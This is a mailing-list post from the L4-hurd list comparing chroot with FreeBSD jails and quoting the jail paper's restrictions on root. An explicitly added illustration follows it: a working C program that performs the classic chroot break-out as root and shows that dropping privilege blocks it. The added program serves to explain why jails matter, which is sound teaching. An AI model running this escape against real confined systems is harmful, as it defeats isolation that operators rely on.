[ams ]
> It is not true that "chroot is insecure on all platforms".
> All UNIXoid platforms. There are several ways to break out of a
> chroot on them.
> If you are looking for an alternative, one that works and is
> actually used around the world, have a look at BSD jails. They
> provide a more thorough encapsulation than chroot.
> BSD jails use chroot AFAIK.
Yes. Jail uses chroot. It also adds a lot more restrictions and
is often used to confine larger subsystems. From [1]:
================================================================
Processes running with root privileges in the jail find that there are
serious restrictions on what they are capable of doing -- in particular,
activities that would extend outside of the jail:
+ Modifying the running kernel by direct access and loading kernel
modules is prohibited.
+ Modifying any of the network configuration, interfaces, addresses,
and routing table is prohibited.
+ Mounting and unmounting file systems is prohibited.
+ Creating device nodes is prohibited.
+ Accessing raw, divert, or routing sockets is prohibited.
+ Modifying kernel runtime parameters, such as most sysctl settings,
is prohibited.
+ Changing securelevel-related file flags is prohibited.
+ Accessing network resources not associated with the jail is
prohibited.
Other privileged activities are permitted as long as they are limited
to the scope of the jail:
+ Signalling any process within the jail is permitted.
+ Changing the ownership and mode of any file within the jail is
permitted, as long as the file flags permit this.
+ Deleting any file within the jail is permitted, as long as the file
flags permit this.
+ Binding reserved TCP and UDP port numbers on the jail's IP address is
permitted. (Attempts to bind TCP and UDP ports using INADDR_ANY will
be redirected to the jail's IP address.)
+ Functions which operate on the uid/gid space are all permitted since
they act as labels for filesystem objects or processes which are
partitioned off by other mechanisms.
================================================================
In short, some of the (AFAIK) most important features are that
jail prevents processes from accessing hardware directly, and that it
prevents processes from binding to arbitrary IP addresses. In some
ways a jail is more akin to a Solaris Zone or a virtual machine.
eSk
[1] http://docs.freebsd.org/44doc/papers/jail/jail.ps.gz
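Added illustration, not part of the original mail or of the jail paper: a
C program for Linux that runs the classic chroot break-out the thread
alludes to (mkdir, chroot into the subdirectory so that the cwd ends up
outside the new root, chdir("..") up to the real root, chroot(".")), and
shows that a chroot plus chdir("/") only holds once root is dropped.
That is exactly the gap jail fills differently: it keeps root inside but
restricts what root may do. The paths under /tmp, the uid/gid 65534 and
all function names are this example's own assumptions; it needs root to
prove anything and reports DEMO_UNAVAILABLE when run unprivileged.

```c
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Outcome of one confinement experiment (carried in the child's exit code). */
enum demo_result {
    DEMO_ESCAPED     = 0, /* attacker code reached a file outside the chroot */
    DEMO_CONTAINED   = 1, /* attacker code stayed inside */
    DEMO_UNAVAILABLE = 2  /* not root / chroot refused here: nothing proven */
};

/* Unprivileged identity the hardened variant drops to ("nobody" on most
 * systems; an assumption of this example). */
#define DROP_UID 65534
#define DROP_GID 65534

/* Textbook break-out, only possible while still root: move the root *down*
 * into a fresh subdirectory so the unchanged cwd is now outside it, climb
 * with ".." past the old root to the real "/", then re-chroot there. */
static int try_escape(void)
{
    if (mkdir(".esc", 0700) != 0 && errno != EEXIST) return -1;
    if (chroot(".esc") != 0) return -1;   /* cwd is now outside the new root */
    for (int i = 0; i < 64; i++)
        if (chdir("..") != 0) return -1;  /* ".." is not pinned: walks to real "/" */
    return chroot(".");                   /* root := real root */
}

/* Child: confine self under `root`, optionally give up root, then attack.
 * `marker` is a file that exists only outside the chroot. */
static void confine_and_attack(const char *root, const char *marker, int drop_root)
{
    if (chroot(root) != 0 || chdir("/") != 0) _exit(DEMO_UNAVAILABLE);
    if (access(marker, F_OK) == 0) _exit(DEMO_UNAVAILABLE); /* chroot not effective */
    if (drop_root &&
        (setgroups(0, NULL) != 0 || setgid(DROP_GID) != 0 || setuid(DROP_UID) != 0))
        _exit(DEMO_UNAVAILABLE);
    try_escape();   /* failures are the point: they mean containment held */
    _exit(access(marker, F_OK) == 0 ? DEMO_ESCAPED : DEMO_CONTAINED);
}

/* Parent: build /tmp/chrootdemo.XXXXXX/{root,marker}, fork the experiment,
 * collect its verdict and clean up. drop_root=0 is the naive jailer that
 * keeps uid 0 inside; drop_root=1 additionally switches to DROP_UID. */
static enum demo_result run_experiment(int drop_root)
{
    char dir[] = "/tmp/chrootdemo.XXXXXX";
    if (mkdtemp(dir) == NULL) return DEMO_UNAVAILABLE;
    chmod(dir, 0755);                     /* let the dropped uid traverse it */
    char root[64], marker[64], esc[80];
    snprintf(root, sizeof root, "%s/root", dir);
    snprintf(marker, sizeof marker, "%s/marker", dir);
    snprintf(esc, sizeof esc, "%s/.esc", root);
    mkdir(root, 0755);
    int fd = open(marker, O_CREAT | O_WRONLY, 0644);
    if (fd >= 0) close(fd);

    enum demo_result res = DEMO_UNAVAILABLE;
    pid_t pid = fork();
    if (pid == 0) confine_and_attack(root, marker, drop_root);
    if (pid > 0) {
        int status;
        if (waitpid(pid, &status, 0) == pid && WIFEXITED(status))
            res = (enum demo_result)WEXITSTATUS(status);
    }
    rmdir(esc); rmdir(root); unlink(marker); rmdir(dir);
    return res;
}

static const char *describe(enum demo_result r)
{
    return r == DEMO_ESCAPED ? "ESCAPED" : r == DEMO_CONTAINED ? "CONTAINED"
                                         : "UNAVAILABLE (need root)";
}

int main(void)
{
    printf("chroot + chdir(\"/\"), still root   : %s\n", describe(run_experiment(0)));
    printf("chroot + chdir(\"/\"), root dropped : %s\n", describe(run_experiment(1)));
    return 0;
}
```

Run as root (in a throwaway VM or container) the first line reports ESCAPED
and the second CONTAINED; unprivileged, both report UNAVAILABLE because
chroot(2) itself needs root. The escape relies on nothing but the fact that
chroot does not take away privilege, which is why a root process in a plain
chroot is never confined, and why jail's list of prohibited root activities
above is the substantive difference rather than the chroot it is built on.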
_______________________________________________
L4-hurd mailing list
[email protected]
http://lists.gnu.org/mailman/listinfo/l4-hurd